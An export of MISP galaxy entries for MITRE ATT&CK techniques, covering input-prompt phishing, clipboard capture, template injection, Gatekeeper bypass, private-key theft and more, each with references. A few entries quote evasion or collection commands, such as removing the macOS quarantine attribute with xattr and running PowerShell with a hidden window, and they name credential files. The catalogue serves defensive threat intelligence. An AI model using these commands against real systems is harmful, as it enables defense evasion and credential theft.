The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.

Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)

Specific approaches to this technique include:

Impersonate the identity of a legitimate application

A malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)

Display a prompt on top of a running legitimate application

A malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the ActivityManager API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include:

A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)
A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the SYSTEM_ALERT_WINDOW permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The SYSTEM_ALERT_WINDOW permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)

Fake device notifications

A malicious application could send fake device notifications to the user. Clicking on the device notification could trigger the malicious application to display an input prompt.(Citation: Group IB Gustuff Mar 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411"

Table 3879. Table References
Links
https://attack.mitre.org/techniques/T1411
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html
http://w2spconf.com/2011/papers/felt-mobilephishing.pdf
https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/
https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29
http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag
https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html
https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf
https://developer.android.com/guide/components/activities/background-starts
http://cloak-and-dagger.org/
https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/
https://www.skycure.com/blog/accessibility-clickjacking/
https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/
https://www.group-ib.com/blog/gustuff

Input Prompt - T1141

When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1088)).

The tag is: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141"

View relationships graph

Input Prompt - T1141 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

Table 3880. Table References
Links
https://attack.mitre.org/techniques/T1141
https://capec.mitre.org/data/definitions/569.html
https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html
https://logrhythm.com/blog/do-you-trust-your-computer/
https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/
https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/

Clipboard Data - T1115

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

In Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, <code>pbpaste</code>, to grab clipboard contents.(Citation: Operating with EmPyre)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115"

Table 3881. Table References
Links
https://attack.mitre.org/techniques/T1115
https://capec.mitre.org/data/definitions/637.html
https://msdn.microsoft.com/en-us/library/ms649012
https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363

LC_LOAD_DYLIB Addition - T1161

Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long adjustments are made to the rest of the fields and dependencies (Citation: Writing Bad Malware for OSX). There are tools available to perform these changes. Any changes will invalidate digital signatures on binaries because the binary is being modified. Adversaries can remediate this issue by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time (Citation: Malware Persistence on OS X).

The tag is: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161"

View relationships graph

LC_LOAD_DYLIB Addition - T1161 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006" with estimative-language:likelihood-probability="almost-certain"

Table 3882. Table References
Links
https://attack.mitre.org/techniques/T1161
https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Code Signing - T1116

Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) However, adversaries are known to use code signing certificates to masquerade malware and tools as legitimate binaries (Citation: Janicab). The certificates used during an operation may be created, forged, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing - T1116"

View relationships graph

Code Signing - T1116 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"

Table 3883. Table References
Links
https://attack.mitre.org/techniques/T1116
https://en.wikipedia.org/wiki/Code_signing
http://www.thesafemac.com/new-signed-malware-called-janicab/
https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/
http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

Automated Collection - T1119

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.

The tag is: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119"

Table 3884. Table References
Links
https://attack.mitre.org/techniques/T1119

Template Injection - T1221

Adversaries may create or modify references in Office document templates to conceal malicious code or force authentication attempts. Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered. (Citation: Microsoft Open XML July 2017)

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse this technology to initially conceal malicious code to be executed via documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. (Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. (Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit. (Citation: MalwareBytes Template Injection OCT 2017)

This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt. (Citation: Anomali Template Injection MAR 2018) (Citation: Talos Template Injection July 2017) (Citation: ryhanson phishery SEPT 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Template Injection - T1221"

Table 3885. Table References
Links
https://attack.mitre.org/techniques/T1221
https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)
https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780
http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html
https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/
https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104
https://blog.talosintelligence.com/2017/07/template-injection.html
https://github.com/ryhanson/phishery

Audio Capture - T1123

An adversary can leverage a computer’s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

The tag is: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123"

Table 3886. Table References
Links
https://attack.mitre.org/techniques/T1123
https://capec.mitre.org/data/definitions/634.html

Data Encoding - T1132

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

The tag is: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132"

Table 3887. Table References
Links
https://attack.mitre.org/techniques/T1132
https://en.wikipedia.org/wiki/Binary-to-text_encoding
https://en.wikipedia.org/wiki/Character_encoding
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Capture Camera - T1512

Adversaries may utilize the camera to capture information about the user, their surroundings, or other physical identifiers. Adversaries may use the physical camera devices on a mobile device to capture images or video. By default, in Android and iOS, an application must request permission to access a camera device which is granted by the user through a request prompt. In Android, applications must hold the android.permission.CAMERA permission to access the camera. In iOS, applications must include the NSCameraUsageDescription key in the Info.plist file, and must request access to the camera at runtime.

The tag is: misp-galaxy:mitre-attack-pattern="Capture Camera - T1512"

Table 3888. Table References
Links
https://attack.mitre.org/techniques/T1512
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

Video Capture - T1125

An adversary can leverage a computer’s peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim’s screen.

In macOS, there are a few different malware samples that record the user’s webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)

The tag is: misp-galaxy:mitre-attack-pattern="Video Capture - T1125"

Table 3889. Table References
Links
https://attack.mitre.org/techniques/T1125
https://capec.mitre.org/data/definitions/634.html
https://objective-see.com/blog/blog_0x25.html

Login Item - T1162

MacOS provides the option to list specific applications to run when a user logs in. These applications run under the logged in user’s context, and will be started every time the user logs in. Login items installed using the Service Management Framework are not visible in the System Preferences and can only be removed by the application that created them (Citation: Adding Login Items). Users have direct control over login items installed using a shared file list which are also visible in System Preferences (Citation: Adding Login Items). These login items are stored in the user’s <code>~/Library/Preferences/</code> directory in a plist file called <code>com.apple.loginitems.plist</code> (Citation: Methods of Mac Malware Persistence). Some of these applications can open visible dialogs to the user, but they don’t all have to since there is an option to ‘Hide’ the window. If an adversary can register their own login item or modified an existing one, then they can use it to execute their code for a persistence mechanism each time the user logs in (Citation: Malware Persistence on OS X) (Citation: OSX.Dok Malware). The API method <code> SMLoginItemSetEnabled </code> can be used to set Login Items, but scripting languages like [AppleScript](https://attack.mitre.org/techniques/T1155) can do this as well (Citation: Adding Login Items).

The tag is: misp-galaxy:mitre-attack-pattern="Login Item - T1162"

View relationships graph

revoked-by: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"

Table 3890. Table References
Links
https://attack.mitre.org/techniques/T1162
https://capec.mitre.org/data/definitions/564.html
https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/

Domain Fronting - T1172

Domain fronting takes advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) The technique involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).

The tag is: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1172"

View relationships graph

Domain Fronting - T1172 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Domain Fronting - T1090.004" with estimative-language:likelihood-probability="almost-certain"

Table 3891. Table References
Links
https://attack.mitre.org/techniques/T1172
http://www.icir.org/vern/papers/meek-PETS-2015.pdf

AppCert DLLs - T1182

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Endgame Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

The tag is: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1182"

View relationships graph

AppCert DLLs - T1182 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

Table 3892. Table References
Links
https://attack.mitre.org/techniques/T1182
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://technet.microsoft.com/en-us/sysinternals/bb963902
https://forum.sysinternals.com/appcertdlls_topic12546.html

Spearphishing Link - T1192

Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192"

View relationships graph

Spearphishing Link - T1192 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

Table 3893. Table References
Links
https://attack.mitre.org/techniques/T1192
https://capec.mitre.org/data/definitions/163.html
https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

Shared Modules - T1129

Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like <code>CreateProcess</code>, <code>LoadLibrary</code>, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)

The module loader can load DLLs:

via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
via <code><file name="filename.extension" loadFrom="fully-qualified or relative pathname"></code> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.

Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute share modules to load additional components or features.

The tag is: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129"

Table 3894. Table References
Links
https://attack.mitre.org/techniques/T1129
https://en.wikipedia.org/wiki/Microsoft_Windows_library_files

Obfuscate infrastructure - T1331

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331"

View relationships graph

Obfuscate infrastructure - T1331 has relationships with:

related-to: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1309" with estimative-language:likelihood-probability="almost-certain"

Table 3895. Table References
Links
https://attack.mitre.org/techniques/T1331

Hidden Window - T1143

Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.

Windows

There are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)

Mac

The configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143"

View relationships graph

Hidden Window - T1143 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 3896. Table References
Links
https://attack.mitre.org/techniques/T1143
https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1
https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

Screen Capture - T1513

Adversaries may use screen captures to collect information about applications running in the foreground, capture user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android MediaProjectionManager (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android screencap or screenrecord commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"

Table 3897. Table References
Links
https://attack.mitre.org/techniques/T1513
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html
https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html
https://developer.android.com/reference/android/media/projection/MediaProjectionManager
https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf
https://developer.android.com/studio/command-line/adb
https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/

Create Account - T1136

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

The tag is: misp-galaxy:mitre-attack-pattern="Create Account - T1136"

Table 3898. Table References
Links
https://attack.mitre.org/techniques/T1136
https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Application Shimming - T1138

The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Endgame Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

<code>%WINDIR%\AppPatch\sysmain.sdb</code>
<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

<code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code>
<code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc.

The tag is: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138"

View relationships graph

Application Shimming - T1138 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 3899. Table References
Links
https://attack.mitre.org/techniques/T1138
https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

Authentication attempt - T1381

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)

The tag is: misp-galaxy:mitre-attack-pattern="Authentication attempt - T1381"

Table 3900. Table References
Links
https://attack.mitre.org/techniques/T1381

Spearphishing Attachment - T1193

Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193"

View relationships graph

Spearphishing Attachment - T1193 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 3901. Table References
Links
https://attack.mitre.org/techniques/T1193
https://capec.mitre.org/data/definitions/163.html

Bash History - T1139

Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

The tag is: misp-galaxy:mitre-attack-pattern="Bash History - T1139"

View relationships graph

Bash History - T1139 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

Table 3902. Table References
Links
https://attack.mitre.org/techniques/T1139
http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

Gatekeeper Bypass - T1144

In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple’s Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.

Apps loaded onto the system from USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command <code>xattr /path/to/MyApp.app</code> for <code>com.apple.quarantine</code>. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, <code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)

In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS’s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)

The tag is: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144"

View relationships graph

Gatekeeper Bypass - T1144 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1553.001" with estimative-language:likelihood-probability="almost-certain"

Table 3903. Table References
Links
https://attack.mitre.org/techniques/T1144
https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/
https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update
https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/

Foreground Persistence - T1541

Adversaries may abuse Android’s startForeground() API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android’s startForeground() API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)

Malicious applications may abuse the startForeground() API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device’s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)

Malicious applications may also abuse the startForeground() API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)

The tag is: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541"

Table 3904. Table References
Links
https://attack.mitre.org/techniques/T1541
https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html
https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices
https://developer.android.com/guide/components/services.html#Foreground
https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/

Private Keys - T1145

Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)

Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows.

Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.

Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)

The tag is: misp-galaxy:mitre-attack-pattern="Private Keys - T1145"

View relationships graph

Private Keys - T1145 has relationships with:

revoked-by: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 3905. Table References
Links
https://attack.mitre.org/techniques/T1145
https://en.wikipedia.org/wiki/Public-key_cryptography
https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

Lockscreen Bypass - T1461

An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen.

Biometric Spoofing

If biometric authentication is used, an adversary could attempt to spoof a mobile device’s biometric authentication mechanism(Citation: SRLabs-Fingerprint)(Citation: SecureIDNews-Spoof)(Citation: TheSun-FaceID).

Device Unlock Code Guessing or Brute Force

An adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing ("shoulder surfing") the device owner’s use of the lockscreen passcode.

Exploit Other Device Lockscreen Vulnerabilities

Techniques have periodically been demonstrated that exploit vulnerabilities on Android (Citation: Wired-AndroidBypass), iOS (Citation: Kaspersky-iOSBypass), or other mobile devices to bypass the device lockscreen. The vulnerabilities are generally patched by the device/operating system vendor once they become aware of their existence.

The tag is: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461"

Table 3906. Table References
Links
https://attack.mitre.org/techniques/T1461
https://srlabs.de/bites/spoofing-fingerprints/
https://thehackernews.com/2016/05/android-kernal-exploit.htmlhttps://www.secureidnews.com/news-item/another-spoof-of-mobile-biometrics/
https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/
https://support.apple.com/en-us/HT204587
